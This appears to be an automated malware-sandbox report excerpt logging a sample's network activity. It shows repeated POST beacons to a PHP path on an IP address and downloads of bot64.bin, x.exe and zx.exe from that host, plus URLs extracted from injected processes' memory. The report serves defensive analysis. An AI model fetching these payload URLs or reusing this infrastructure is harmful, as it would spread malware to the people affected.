          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: global trafficHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.140
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF63A831C20 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,HeapAlloc,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF63A831C20
          Source: global trafficHTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /bin/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /x.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
          Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
          Source: unknownHTTP traffic detected: POST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
          Source: explorer.exe, 00000004.00000000.1851675357.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/
          Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/3
          Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/C
          Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/W
          Source: svchost.exe, 00000002.00000002.3070369463.000001301D013000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000004.00000003.2514758574.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853072283.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1851675357.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853217838.000000000CB43000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3084100144.000000000CA86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2514169322.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853574308.000000000F09D000.00000004.00000001.00020000.00000000.sdmp, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeString found in binary or memory: http://176.111.174.140/bin/bot64.bin
          Source: explorer.exe, 00000004.00000000.1853217838.000000000CB43000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/bin/bot64.bin0
          Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/bin/bot64.bin69
          Source: explorer.exe, 00000004.00000000.1853072283.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/bin/bot64.binF
          Source: svchost.exe, 00000002.00000002.3070369463.000001301D013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/bin/bot64.binID
          Source: svchost.exe, 00000002.00000002.3070369463.000001301D013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/bin/bot64.binem32
          Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/bin/bot64.bins
          Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/dy/
          Source: explorer.exe, 00000004.00000003.1943155660.000000000AB5C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/x.exe
          Source: explorer.exe, 00000004.00000003.1943155660.000000000AB5C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.140/zx.exe
          Source: file.exe, svchost.exe, explorer.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exeString found in binary or memory: http://176.111.174.177/bin/bot64.bin
          Source: svchost.exe, 00000002.00000002.3071197547.000001301D095000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3086359645.000000000F5D0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3084379266.000000000CB63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853448227.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853992940.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2514586973.000000000CB72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.177/bin/bot64.binhttp://176.111.174.140/bin/bot64.bininvalid
          Source: file.exe, 7D3ED97FB83B796922796.exe.0.drString found in binary or memory: http://176.111.174.177/bin/bot64.binhttp://176.111.174.140/bin/bot64.binprocexp.exeprocexp64.exeTOTA
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: explorer.exe, 00000004.00000000.1847603303.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: explorer.exe, 00000004.00000000.1847603303.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: explorer.exe, 00000004.00000000.1847603303.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
          Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
